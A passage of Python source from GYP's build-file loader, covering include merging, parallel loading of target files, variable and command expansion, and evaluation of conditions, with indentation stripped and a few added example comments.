if is_target:
LoadBuildFileIncludesIntoDict(
build_file_data, build_file_path, data, aux_data, includes, check
)
else:
LoadBuildFileIncludesIntoDict(
build_file_data, build_file_path, data, aux_data, None, check
)
except Exception as e:
gyp.common.ExceptionAppend(
e, "while reading includes of " + build_file_path
)
raise
return build_file_data
def LoadBuildFileIncludesIntoDict(
subdict, subdict_path, data, aux_data, includes, check
):
includes_list = []
if includes is not None:
includes_list.extend(includes)
if "includes" in subdict:
for include in subdict["includes"]:
# "include" is specified relative to subdict_path, so compute the real
# path to include by appending the provided "include" to the directory
# in which subdict_path resides.
relative_include = os.path.normpath(
os.path.join(os.path.dirname(subdict_path), include)
)
includes_list.append(relative_include)
# Unhook the includes list, it's no longer needed.
del subdict["includes"]
# Merge in the included files.
for include in includes_list:
if "included" not in aux_data[subdict_path]:
aux_data[subdict_path]["included"] = []
aux_data[subdict_path]["included"].append(include)
gyp.DebugOutput(gyp.DEBUG_INCLUDES, "Loading Included File: '%s'", include)
MergeDicts(
subdict,
LoadOneBuildFile(include, data, aux_data, None, False, check),
subdict_path,
include,
)
# Recurse into subdictionaries.
for k, v in subdict.items():
if type(v) is dict:
LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, None, check)
elif type(v) is list:
LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data, check):
for item in sublist:
if type(item) is dict:
LoadBuildFileIncludesIntoDict(
item, sublist_path, data, aux_data, None, check
)
elif type(item) is list:
LoadBuildFileIncludesIntoList(item, sublist_path, data, aux_data, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
if "targets" in data:
target_list = data["targets"]
new_target_list = []
for target in target_list:
# If this target already has an explicit 'toolset', and no 'toolsets'
# list, don't modify it further.
if "toolset" in target and "toolsets" not in target:
new_target_list.append(target)
continue
if multiple_toolsets:
toolsets = target.get("toolsets", ["target"])
else:
toolsets = ["target"]
# Make sure this 'toolsets' definition is only processed once.
if "toolsets" in target:
del target["toolsets"]
if len(toolsets) > 0:
# Optimization: only do copies if more than one toolset is specified.
for build in toolsets[1:]:
new_target = gyp.simple_copy.deepcopy(target)
new_target["toolset"] = build
new_target_list.append(new_target)
target["toolset"] = toolsets[0]
new_target_list.append(target)
data["targets"] = new_target_list
if "conditions" in data:
for condition in data["conditions"]:
if type(condition) is list:
for condition_dict in condition[1:]:
if type(condition_dict) is dict:
ProcessToolsetsInDict(condition_dict)
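# Illustrative sketch (added; assumes the module-level multiple_toolsets
# flag has been set to True by the generator):
# >>> d = {'targets': [{'target_name': 'x', 'toolsets': ['host', 'target']}]}
# >>> ProcessToolsetsInDict(d)
# >>> sorted(t['toolset'] for t in d['targets'])
# ['host', 'target']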
# TODO(mark): I don't love this name. It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(
build_file_path,
data,
aux_data,
variables,
includes,
depth,
check,
load_dependencies,
):
# If depth is set, predefine the DEPTH variable to be a relative path from
# this build file's directory to the directory identified by depth.
if depth:
# TODO(dglazkov) The backslash/forward-slash replacement at the end is a
# temporary measure. This should really be addressed by keeping all paths
# in POSIX until actual project generation.
d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
if d == "":
variables["DEPTH"] = "."
else:
variables["DEPTH"] = d.replace("\\", "/")
# The 'target_build_files' key is only set when loading target build files in
# the non-parallel code path, where LoadTargetBuildFile is called
# recursively. In the parallel code path, we don't need to check whether the
# |build_file_path| has already been loaded, because the 'scheduled' set in
# ParallelState guarantees that we never load the same |build_file_path|
# twice.
if "target_build_files" in data:
if build_file_path in data["target_build_files"]:
# Already loaded.
return False
data["target_build_files"].add(build_file_path)
gyp.DebugOutput(
gyp.DEBUG_INCLUDES, "Loading Target Build File '%s'", build_file_path
)
build_file_data = LoadOneBuildFile(
build_file_path, data, aux_data, includes, True, check
)
# Store DEPTH for later use in generators.
build_file_data["_DEPTH"] = depth
# Set up the included_files key indicating which .gyp files contributed to
# this target dict.
if "included_files" in build_file_data:
raise GypError(build_file_path + " must not contain included_files key")
included = GetIncludedBuildFiles(build_file_path, aux_data)
build_file_data["included_files"] = []
for included_file in included:
# included_file is relative to the current directory, but it needs to
# be made relative to build_file_path's directory.
included_relative = gyp.common.RelativePath(
included_file, os.path.dirname(build_file_path)
)
build_file_data["included_files"].append(included_relative)
# Do a first round of toolsets expansion so that conditions can be defined
# per toolset.
ProcessToolsetsInDict(build_file_data)
# Apply "pre"/"early" variable expansions and condition evaluations.
ProcessVariablesAndConditionsInDict(
build_file_data, PHASE_EARLY, variables, build_file_path
)
# Since some toolsets might have been defined conditionally, perform
# a second round of toolsets expansion now.
ProcessToolsetsInDict(build_file_data)
# Look at each project's target_defaults dict, and merge settings into
# targets.
if "target_defaults" in build_file_data:
if "targets" not in build_file_data:
raise GypError("Unable to find targets in build file %s" % build_file_path)
index = 0
while index < len(build_file_data["targets"]):
# This procedure needs to give the impression that target_defaults is
# used as defaults, and the individual targets inherit from that.
# The individual targets need to be merged into the defaults. Make
# a deep copy of the defaults for each target, merge the target dict
# as found in the input file into that copy, and then hook up the
# copy with the target-specific data merged into it as the replacement
# target dict.
old_target_dict = build_file_data["targets"][index]
new_target_dict = gyp.simple_copy.deepcopy(
build_file_data["target_defaults"]
)
MergeDicts(
new_target_dict, old_target_dict, build_file_path, build_file_path
)
build_file_data["targets"][index] = new_target_dict
index += 1
# No longer needed.
del build_file_data["target_defaults"]
# Look for dependencies. This means that dependency resolution occurs
# after "pre" conditionals and variable expansion, but before "post" -
# in other words, you can't put a "dependencies" section inside a "post"
# conditional within a target.
dependencies = []
if "targets" in build_file_data:
for target_dict in build_file_data["targets"]:
if "dependencies" not in target_dict:
continue
for dependency in target_dict["dependencies"]:
dependencies.append(
gyp.common.ResolveTarget(build_file_path, dependency, None)[0]
)
if load_dependencies:
for dependency in dependencies:
try:
LoadTargetBuildFile(
dependency,
data,
aux_data,
variables,
includes,
depth,
check,
load_dependencies,
)
except Exception as e:
gyp.common.ExceptionAppend(
e, "while loading dependencies of %s" % build_file_path
)
raise
else:
return (build_file_path, dependencies)
def CallLoadTargetBuildFile(
global_flags,
build_file_path,
variables,
includes,
depth,
check,
generator_input_info,
):
"""Wrapper around LoadTargetBuildFile for parallel processing.
This wrapper is used when LoadTargetBuildFile is executed in
a worker process.
"""
try:
signal.signal(signal.SIGINT, signal.SIG_IGN)
# Apply globals so that the worker process behaves the same.
for key, value in global_flags.items():
globals()[key] = value
SetGeneratorGlobals(generator_input_info)
result = LoadTargetBuildFile(
build_file_path,
per_process_data,
per_process_aux_data,
variables,
includes,
depth,
check,
False,
)
if not result:
return result
(build_file_path, dependencies) = result
# We can safely pop the build_file_data from per_process_data because it
# will never be referenced by this process again, so we don't need to keep
# it in the cache.
build_file_data = per_process_data.pop(build_file_path)
# This gets serialized and sent back to the main process via a pipe.
# It's handled in LoadTargetBuildFileCallback.
return (build_file_path, build_file_data, dependencies)
except GypError as e:
sys.stderr.write("gyp: %s\n" % e)
return None
except Exception as e:
print("Exception:", e, file=sys.stderr)
print(traceback.format_exc(), file=sys.stderr)
return None
class ParallelProcessingError(Exception):
pass
class ParallelState(object):
"""Class to keep track of state when processing input files in parallel.
If build files are loaded in parallel, use this to keep track of
state during farming out and processing parallel jobs. It's stored
in a global so that the callback function can have access to it.
"""
def __init__(self):
# The multiprocessing pool.
self.pool = None
# The condition variable used to protect this object and notify
# the main loop when there might be more data to process.
self.condition = None
# The "data" dict that was passed to LoadTargetBuildFileParallel
self.data = None
# The number of parallel calls outstanding; decremented when a response
# was received.
self.pending = 0
# The set of all build files that have been scheduled, so we don't
# schedule the same one twice.
self.scheduled = set()
# A list of dependency build file paths that haven't been scheduled yet.
self.dependencies = []
# Flag to indicate if there was an error in a child process.
self.error = False
def LoadTargetBuildFileCallback(self, result):
"""Handle the results of running LoadTargetBuildFile in another process.
"""
self.condition.acquire()
if not result:
self.error = True
self.condition.notify()
self.condition.release()
return
(build_file_path0, build_file_data0, dependencies0) = result
self.data[build_file_path0] = build_file_data0
self.data["target_build_files"].add(build_file_path0)
for new_dependency in dependencies0:
if new_dependency not in self.scheduled:
self.scheduled.add(new_dependency)
self.dependencies.append(new_dependency)
self.pending -= 1
self.condition.notify()
self.condition.release()
def LoadTargetBuildFilesParallel(
build_files, data, variables, includes, depth, check, generator_input_info
):
parallel_state = ParallelState()
parallel_state.condition = threading.Condition()
# Make copies of the build_files argument that we can modify while working.
parallel_state.dependencies = list(build_files)
parallel_state.scheduled = set(build_files)
parallel_state.pending = 0
parallel_state.data = data
try:
parallel_state.condition.acquire()
while parallel_state.dependencies or parallel_state.pending:
if parallel_state.error:
break
if not parallel_state.dependencies:
parallel_state.condition.wait()
continue
dependency = parallel_state.dependencies.pop()
parallel_state.pending += 1
global_flags = {
"path_sections": globals()["path_sections"],
"non_configuration_keys": globals()["non_configuration_keys"],
"multiple_toolsets": globals()["multiple_toolsets"],
}
if not parallel_state.pool:
parallel_state.pool = multiprocessing.Pool(multiprocessing.cpu_count())
parallel_state.pool.apply_async(
CallLoadTargetBuildFile,
args=(
global_flags,
dependency,
variables,
includes,
depth,
check,
generator_input_info,
),
callback=parallel_state.LoadTargetBuildFileCallback,
)
except KeyboardInterrupt as e:
parallel_state.pool.terminate()
raise e
parallel_state.condition.release()
parallel_state.pool.close()
parallel_state.pool.join()
parallel_state.pool = None
if parallel_state.error:
sys.exit(1)
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple. For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
LBRACKETS = set("{[(")
BRACKETS = {"}": "{", "]": "[", ")": "("}
def FindEnclosingBracketGroup(input_str):
stack = []
start = -1
for index, char in enumerate(input_str):
if char in LBRACKETS:
stack.append(char)
if start == -1:
start = index
elif char in BRACKETS:
if not stack:
return (-1, -1)
if stack.pop() != BRACKETS[char]:
return (-1, -1)
if not stack:
return (start, index + 1)
return (-1, -1)
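# Illustrative doctest (added), matching the example in the comment above:
# >>> FindEnclosingBracketGroup("<(foo <(bar)) blah")
# (1, 13)
# >>> FindEnclosingBracketGroup("no brackets")
# (-1, -1)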
def IsStrCanonicalInt(string):
"""Returns True if |string| is in its canonical integer form.
The canonical form is such that str(int(string)) == string.
"""
if type(string) is str:
# This function is called a lot so for maximum performance, avoid
# involving regexps which would otherwise make the code much
# shorter. Regexps would need twice the time of this function.
if string:
if string == "0":
return True
if string[0] == "-":
string = string[1:]
if not string:
return False
if "1" <= string[0] <= "9":
return string.isdigit()
return False
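# Illustrative doctest (added, not in the source):
# >>> IsStrCanonicalInt("10"), IsStrCanonicalInt("-5")
# (True, True)
# >>> IsStrCanonicalInt("010")  # leading zero: str(int("010")) != "010"
# False
# >>> IsStrCanonicalInt(10)     # non-strings are never canonical
# False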
# This matches things like "<(asdf)", "<!(cmd)", "<!@(cmd)", "<|(list)",
# "<!interpreter(arguments)", "<([list])", and even "<([)" and "<(<())".
# In the last case, the inner "<()" is captured in match['content'].
early_variable_re = re.compile(
r"(?P<replace>(?P<type><(?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# This matches the same as early_variable_re, but with '>' instead of '<'.
late_variable_re = re.compile(
r"(?P<replace>(?P<type>>(?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# This matches the same as early_variable_re, but with '^' instead of '<'.
latelate_variable_re = re.compile(
r"(?P<replace>(?P<type>[\^](?:(?:!?@?)|\|)?)"
r"(?P<command_string>[-a-zA-Z0-9_.]+)?"
r"\((?P<is_array>\s*\[?)"
r"(?P<content>.*?)(\]?)\))"
)
# Global cache of results from running commands so they don't have to be run
# more than once.
cached_command_results = {}
def FixupPlatformCommand(cmd):
if sys.platform == "win32":
if type(cmd) is list:
cmd = [re.sub("^cat ", "type ", cmd[0])] + cmd[1:]
else:
cmd = re.sub("^cat ", "type ", cmd)
return cmd
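# Illustrative behaviour (added): on win32 a leading 'cat ' is rewritten to
# 'type ' for cmd.exe, e.g. FixupPlatformCommand("cat foo.txt") returns
# "type foo.txt"; on every other platform the command is returned unchanged.
# Note that the list form only applies the rewrite to its first element.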
PHASE_EARLY = 0
PHASE_LATE = 1
PHASE_LATELATE = 2
def ExpandVariables(input, phase, variables, build_file):
# Look for the pattern that gets expanded into variables
if phase == PHASE_EARLY:
variable_re = early_variable_re
expansion_symbol = "<"
elif phase == PHASE_LATE:
variable_re = late_variable_re
expansion_symbol = ">"
elif phase == PHASE_LATELATE:
variable_re = latelate_variable_re
expansion_symbol = "^"
else:
assert False
input_str = str(input)
if IsStrCanonicalInt(input_str):
return int(input_str)
# Do a quick scan to determine if an expensive regex search is warranted.
if expansion_symbol not in input_str:
return input_str
# Get the entire list of matches as a list of MatchObject instances.
# (using findall here would return strings instead of MatchObjects).
matches = list(variable_re.finditer(input_str))
if not matches:
return input_str
output = input_str
# Reverse the list of matches so that replacements are done right-to-left.
# That ensures that earlier replacements won't mess up the string in a
# way that causes later calls to find the earlier substituted text instead
# of what's intended for replacement.
matches.reverse()
for match_group in matches:
match = match_group.groupdict()
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Matches: %r", match)
# match['replace'] is the substring to look for, match['type']
# is the character code for the replacement type (< > <! >! <| >| <@
# >@ <!@ >!@), match['is_array'] contains a '[' for command
# arrays, and match['content'] is the name of the variable (< >)
# or command to run (<! >!). match['command_string'] is an optional
# command string. Currently, only 'pymod_do_main' is supported.
# run_command is true if a ! variant is used.
run_command = "!" in match["type"]
command_string = match["command_string"]
# file_list is true if a | variant is used.
file_list = "|" in match["type"]
# Capture these now so we can adjust them later.
replace_start = match_group.start("replace")
replace_end = match_group.end("replace")
# Find the ending paren, and re-evaluate the contained string.
(c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])
# Adjust the replacement range to match the entire command
# found by FindEnclosingBracketGroup (since the variable_re
# probably doesn't match the entire command if it contained
# nested variables).
replace_end = replace_start + c_end
# Find the "real" replacement, matching the appropriate closing
# paren, and adjust the replacement start and end.
replacement = input_str[replace_start:replace_end]
# Figure out what the contents of the variable parens are.
contents_start = replace_start + c_start + 1
contents_end = replace_end - 1
contents = input_str[contents_start:contents_end]
# Do filter substitution now for <|().
# Admittedly, this is different than the evaluation order in other
# contexts. However, since filtration has no chance to run on <|(),
# this seems like the only obvious way to give them access to filters.
if file_list:
processed_variables = gyp.simple_copy.deepcopy(variables)
ProcessListFiltersInDict(contents, processed_variables)
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase, processed_variables, build_file)
else:
# Recurse to expand variables in the contents
contents = ExpandVariables(contents, phase, variables, build_file)
# Strip off leading/trailing whitespace so that variable matches are
# simpler below (and because they are rarely needed).
contents = contents.strip()
# expand_to_list is true if an @ variant is used. In that case,
# the expansion should result in a list. Note that the caller
# must be expecting a list in return; not all callers do, because
# not all of them are working in list context. Also, for list
# expansions, there can be no other text besides the variable
# expansion in the input string.
expand_to_list = "@" in match["type"] and input_str == replacement
if run_command or file_list:
# Find the build file's directory, so commands can be run or file lists
# generated relative to it.
build_file_dir = os.path.dirname(build_file)
if build_file_dir == "" and not file_list:
# If build_file is just a leaf filename indicating a file in the
# current directory, build_file_dir might be an empty string. Set
# it to None to signal to subprocess.Popen that it should run the
# command in the current directory.
build_file_dir = None
# Support <|(listfile.txt ...) which generates a file
# containing items from a gyp list, generated at gyp time.
# This works around actions/rules which have more inputs than will
# fit on the command line.
if file_list:
if type(contents) is list:
contents_list = contents
else:
contents_list = contents.split(" ")
replacement = contents_list[0]
if os.path.isabs(replacement):
raise GypError('| cannot handle absolute paths, got "%s"' % replacement)
if not generator_filelist_paths:
path = os.path.join(build_file_dir, replacement)
else:
if os.path.isabs(build_file_dir):
toplevel = generator_filelist_paths["toplevel"]
rel_build_file_dir = gyp.common.RelativePath(
build_file_dir, toplevel
)
else:
rel_build_file_dir = build_file_dir
qualified_out_dir = generator_filelist_paths["qualified_out_dir"]
path = os.path.join(qualified_out_dir, rel_build_file_dir, replacement)
gyp.common.EnsureDirExists(path)
replacement = gyp.common.RelativePath(path, build_file_dir)
f = gyp.common.WriteOnDiff(path)
for i in contents_list[1:]:
f.write("%s\n" % i)
f.close()
elif run_command:
use_shell = True
if match["is_array"]:
contents = eval(contents)
use_shell = False
# Check for a cached value to avoid executing commands, or generating
# file lists more than once. The cache key contains the command to be
# run as well as the directory to run it from, to account for commands
# that depend on their current directory.
# TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
# someone could author a set of GYP files where each time the command
# is invoked it produces different output by design. When the need
# arises, the syntax should be extended to support no caching off a
# command's output so it is run every time.
cache_key = (str(contents), build_file_dir)
cached_value = cached_command_results.get(cache_key, None)
if cached_value is None:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Executing command '%s' in directory '%s'",
contents,
build_file_dir,
)
replacement = ""
if command_string == "pymod_do_main":
# <!pymod_do_main(modulename param eters) loads |modulename| as a
# python module and then calls that module's DoMain() function,
# passing ["param", "eters"] as a single list argument. For modules
# that don't load quickly, this can be faster than
# <!(python modulename param eters). Do this in |build_file_dir|.
oldwd = os.getcwd() # Python doesn't like os.open('.'): no fchdir.
if build_file_dir: # build_file_dir may be None (see above).
os.chdir(build_file_dir)
sys.path.append(os.getcwd())
try:
parsed_contents = shlex.split(contents)
try:
py_module = __import__(parsed_contents[0])
except ImportError as e:
raise GypError(
"Error importing pymod_do_main"
"module (%s): %s" % (parsed_contents[0], e)
)
replacement = str(
py_module.DoMain(parsed_contents[1:])
).rstrip()
finally:
sys.path.pop()
os.chdir(oldwd)
assert replacement is not None
elif command_string:
raise GypError(
"Unknown command string '%s' in '%s'."
% (command_string, contents)
)
else:
# Fix up command with platform specific workarounds.
contents = FixupPlatformCommand(contents)
try:
p = subprocess.Popen(
contents,
shell=use_shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
stdin=subprocess.PIPE,
cwd=build_file_dir,
)
except Exception as e:
raise GypError(
"%s while executing command '%s' in %s"
% (e, contents, build_file)
)
p_stdout, p_stderr = p.communicate("")
if PY3:
p_stdout = p_stdout.decode("utf-8")
p_stderr = p_stderr.decode("utf-8")
if p.wait() != 0 or p_stderr:
sys.stderr.write(p_stderr)
# Simulate check_call behavior, since check_call only exists
# in python 2.5 and later.
raise GypError(
"Call to '%s' returned exit status %d while in %s."
% (contents, p.returncode, build_file)
)
replacement = p_stdout.rstrip()
cached_command_results[cache_key] = replacement
else:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Had cache value for command '%s' in directory '%s'",
contents,
build_file_dir,
)
replacement = cached_value
else:
if contents not in variables:
if contents[-1] in ["!", "/"]:
# In order to allow cross-compiles (nacl) to happen more naturally,
# we will allow references to >(sources/) etc. to resolve to
# an empty list if undefined. This allows actions to:
# 'action!': [
# '>@(_sources!)',
# ],
# 'action/': [
# '>@(_sources/)',
# ],
replacement = []
else:
raise GypError(
"Undefined variable " + contents + " in " + build_file
)
else:
replacement = variables[contents]
if isinstance(replacement, bytes) and not isinstance(replacement, str):
replacement = replacement.decode("utf-8") # done on Python 3 only
if type(replacement) is list:
for item in replacement:
if isinstance(item, bytes) and not isinstance(item, str):
item = item.decode("utf-8") # done on Python 3 only
if not contents[-1] == "/" and type(item) not in (str, int):
raise GypError(
"Variable "
+ contents
+ " must expand to a string or list of strings; "
+ "list contains a "
+ item.__class__.__name__
)
# Run through the list and handle variable expansions in it. Since
# the list is guaranteed not to contain dicts, this won't do anything
# with conditions sections.
ProcessVariablesAndConditionsInList(
replacement, phase, variables, build_file
)
elif type(replacement) not in (str, int):
raise GypError(
"Variable "
+ contents
+ " must expand to a string or list of strings; "
+ "found a "
+ replacement.__class__.__name__
)
if expand_to_list:
# Expanding in list context. It's guaranteed that there's only one
# replacement to do in |input_str| and that it's this replacement. See
# above.
if type(replacement) is list:
# If it's already a list, make a copy.
output = replacement[:]
else:
# Split it the same way sh would split arguments.
output = shlex.split(str(replacement))
else:
# Expanding in string context.
encoded_replacement = ""
if type(replacement) is list:
# When expanding a list into string context, turn the list items
# into a string in a way that will work with a subprocess call.
#
# TODO(mark): This isn't completely correct. This should
# call a generator-provided function that observes the
# proper list-to-argument quoting rules on a specific
# platform instead of just calling the POSIX encoding
# routine.
encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
else:
encoded_replacement = replacement
output = (
output[:replace_start] + str(encoded_replacement) + output[replace_end:]
)
# Prepare for the next match iteration.
input_str = output
if output == input:
gyp.DebugOutput(
gyp.DEBUG_VARIABLES,
"Found only identity matches on %r, avoiding infinite " "recursion.",
output,
)
else:
# Look for more matches now that we've replaced some, to deal with
# expanding local variables (variables defined in the same
# variables block as this one).
gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Found output %r, recursing.", output)
if type(output) is list:
if output and type(output[0]) is list:
# Leave output alone if it's a list of lists.
# We don't want such lists to be stringified.
pass
else:
new_output = []
for item in output:
new_output.append(
ExpandVariables(item, phase, variables, build_file)
)
output = new_output
else:
output = ExpandVariables(output, phase, variables, build_file)
# Convert all strings that are canonically-represented integers into integers.
if type(output) is list:
for index, outstr in enumerate(output):
if IsStrCanonicalInt(outstr):
output[index] = int(outstr)
elif IsStrCanonicalInt(output):
output = int(output)
return output
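# Illustrative doctests (added; values assumed, no command expansion involved):
# >>> ExpandVariables("<(foo)/bar", PHASE_EARLY, {"foo": "baz"}, "x.gyp")
# 'baz/bar'
# >>> ExpandVariables("<(num)", PHASE_EARLY, {"num": 5}, "x.gyp")
# 5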
# The same condition is often evaluated over and over again so it
# makes sense to cache as much as possible between evaluations.
cached_conditions_asts = {}
def EvalCondition(condition, conditions_key, phase, variables, build_file):
"""Returns the dict that should be used or None if the result was
that nothing should be used."""
if type(condition) is not list:
raise GypError(conditions_key + " must be a list")
if len(condition) < 2:
# It's possible that condition[0] won't work in which case this
# attempt will raise its own IndexError. That's probably fine.
raise GypError(
conditions_key
+ " "
+ condition[0]
+ " must be at least length 2, not "
+ str(len(condition))
)
i = 0
result = None
while i < len(condition):
cond_expr = condition[i]
true_dict = condition[i + 1]
if type(true_dict) is not dict:
raise GypError(
"{} {} must be followed by a dictionary, not {}".format(
conditions_key, cond_expr, type(true_dict)
)
)
if len(condition) > i + 2 and type(condition[i + 2]) is dict:
false_dict = condition[i + 2]
i = i + 3
if i != len(condition):
raise GypError(
"{} {} has {} unexpected trailing items".format(
conditions_key, cond_expr, len(condition) - i
)
)
else:
false_dict = None
i = i + 2
if result is None:
result = EvalSingleCondition(
cond_expr, true_dict, false_dict, phase, variables, build_file
)
return result
def EvalSingleCondition(cond_expr, true_dict, false_dict, phase, variables, build_file):
"""Returns true_dict if cond_expr evaluates to true, and false_dict
otherwise."""
# Do expansions on the condition itself. Since the condition can naturally
# contain variable references without needing to resort to GYP expansion
# syntax, this is of dubious value for variables, but someone might want to
# use a command expansion directly inside a condition.
cond_expr_expanded = ExpandVariables(cond_expr, phase, variables, build_file)
if type(cond_expr_expanded) not in (str, int):
raise ValueError(
"Variable expansion in this context permits str and int "
+ "only, found "
+ cond_expr_expanded.__class__.__name__
)
try:
if cond_expr_expanded in cached_conditions_asts:
ast_code = cached_conditions_asts[cond_expr_expanded]
else:
ast_code = compile(cond_expr_expanded, "<string>", "eval")
cached_conditions_asts[cond_expr_expanded] = ast_code
env = {"__builtins__": {}, "v": StrictVersion}
if eval(ast_code, env, variables):
return true_dict
return false_dict
except SyntaxError as e:
syntax_error = SyntaxError(
"%s while evaluating condition '%s' in %s "
"at character %d." % (str(e.args[0]), e.text, build_file, e.offset),
e.filename,
e.lineno,
e.offset,
e.text,
)
raise syntax_error
except NameError as e:
gyp.common.ExceptionAppend(
e,
"while evaluating condition '%s' in %s" % (cond_expr_expanded, build_file),
)
raise GypError(e)
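# Illustrative sketch (added; values assumed): a conditions entry is a list
# of [cond_expr, true_dict, (optional) false_dict]. For example:
# >>> cond = ['OS=="linux"', {'defines': ['LINUX']}, {'defines': ['OTHER']}]
# >>> EvalCondition(cond, 'conditions', PHASE_EARLY, {'OS': 'linux'}, 'a.gyp')
# {'defines': ['LINUX']}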
def ProcessConditionsInDict(the_dict, phase, variables, build_file):
# Process a 'conditions' or 'target_conditions' section in the_dict,
# depending on phase.
# early -> conditions
# late -> target_conditions
# latelate -> no conditions
#
# Each item in a conditions list consists of cond_expr, a string expression
# evaluated as the condition, and true_dict, a dict that will be merged into
# the_dict if cond_expr evaluates to true. Optionally, a third item,
# false_dict, may be present. false_dict is merged into the_dict if
# cond_expr evaluates to false.
#
# Any dict merged into the_dict will be recursively processed for nested
# conditionals and other expansions, also according to phase, immediately
# prior to being merged.
if phase == PHASE_EARLY:
conditions_key = "conditions"
elif phase == PHASE_LATE:
conditions_key = "target_conditions"
elif phase == PHASE_LATELATE:
return
else:
assert False
if conditions_key not in the_dict:
return
conditions_list = the_dict[conditions_key]
# Unhook the conditions list, it's no longer needed.
del the_dict[conditions_key]
for condition in conditions_list:
merge_dict = EvalCondition(
condition, conditions_key, phase, variables, build_file
)
if merge_dict is not None:
# Expand variables and nested conditionals in the merge_dict before
# merging it.
ProcessVariablesAndConditionsInDict(
merge_dict, phase, variables, build_file
)
MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
# Any keys with plain string values in the_dict become automatic variables.
# The variable name is the key name with a "_" character prepended.
for key, value in the_dict.items():
if type(value) in (str, int, list):
variables["_" + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
# Any keys in the_dict's "variables" dict, if it has one, becomes a
# variable. The variable name is the key name in the "variables" dict.
# Variables that end with the % character are set only if they are unset in
# the variables dict. the_dict_key is the name of the key that accesses
# the_dict in the_dict's parent dict. If the_dict's parent is not a dict
# (it could be a list or it could be parentless because it is a root dict),
# the_dict_key will be None.
for key, value in the_dict.get("variables", {}).items():
if type(value) not in (str, int, list):
continue
if key.endswith("%"):
variable_name = key[:-1]
if variable_name in variables:
# If the variable is already set, don't set it.
continue
if the_dict_key == "variables" and variable_name in the_dict:
# If the variable is set without a % in the_dict, and the_dict is a
# variables dict (making |variables| a variables sub-dict of a
# variables dict), use the_dict's definition.
value = the_dict[variable_name]
else:
variable_name = key
variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(
the_dict, phase, variables_in, build_file, the_dict_key=None
):
"""Handle all variable and command expansion and conditional evaluation.
This function is the public entry point for all variable expansions and
conditional evaluations. The variables_in dictionary will not be modified
by this function.
"""
# Make a copy of the variables_in dict that can be modified during the
# loading of automatics and the loading of the variables dict.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
if "variables" in the_dict:
# Make sure all the local variables are added to the variables
# list before we process them so that you can reference one
# variable from another. They will be fully expanded by recursion
# in ExpandVariables.
for key, value in the_dict["variables"].items():
variables[key] = value
# Handle the associated variables dict first, so that any variable
# references within can be resolved prior to using them as variables.
# Pass a copy of the variables dict to avoid having it be tainted.
# Otherwise, it would have extra automatics added for everything that
# should just be an ordinary variable in this scope.
ProcessVariablesAndConditionsInDict(
the_dict["variables"], phase, variables, build_file, "variables"
)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
for key, value in the_dict.items():
# Skip "variables", which was already processed if present.
if key != "variables" and type(value) is str:
expanded = ExpandVariables(value, phase, variables, build_file)
if type(expanded) not in (str, int):
raise ValueError(
"Variable expansion in this context permits str and int "
+ "only, found "
+ expanded.__class__.__name__
+ " for "
+ key
)
the_dict[key] = expanded
# Variable expansion may have resulted in changes to automatics. Reload.
# TODO(mark): Optimization: only reload if no changes were made.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Process conditions in this dict. This is done after variable expansion
# so that conditions may take advantage of expanded variables. For example,
# if the_dict contains:
# {'type': '<(library_type)',
# 'conditions': [['_type=="static_library"', { ... }]]},
# _type, as used in the condition, will only be set to the value of
# library_type if variable expansion is performed before condition
# processing. However, condition processing should occur prior to recursion
# so that variables (both automatic and "variables" dict type) may be
# adjusted by conditions sections, merged into the_dict, and have the
# intended impact on contained dicts.
#
# This arrangement means that a "conditions" section containing a "variables"
# section will only have those variables effective in subdicts, not in
# the_dict. The workaround is to put a "conditions" section within a
# "variables" section. For example:
# {'conditions': [['os=="mac"', {'variables': {'define': 'IS_MAC'}}]],
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will not result in "IS_MAC" being appended to the "defines" list in the
# current scope but would result in it being appended to the "defines" list
# within "my_subdict". By comparison:
# {'variables': {'conditions': [['os=="mac"', {'define': 'IS_MAC'}]]},
# 'defines': ['<(define)'],
# 'my_subdict': {'defines': ['<(define)']}},
# will append "IS_MAC" to both "defines" lists.
# Evaluate conditions sections, allowing variable expansions within them
# as well as nested conditionals. This will process a 'conditions' or
# 'target_conditions' section, perform appropriate merging and recursive
# conditional and variable processing, and then remove the conditions section
# from the_dict if it is present.
ProcessConditionsInDict(the_dict, phase, variables, build_file)
# Conditional processing may have resulted in changes to automatics or the
# variables dict. Reload.
variables = variables_in.copy()
LoadAutomaticVariablesFromDict(variables, the_dict)
LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
# Recurse into child dicts, or process child lists which may result in
# further recursion into descendant dicts.
for key, value in the_dict.items():
# Skip "variables" and string values, which were already processed if
# present.
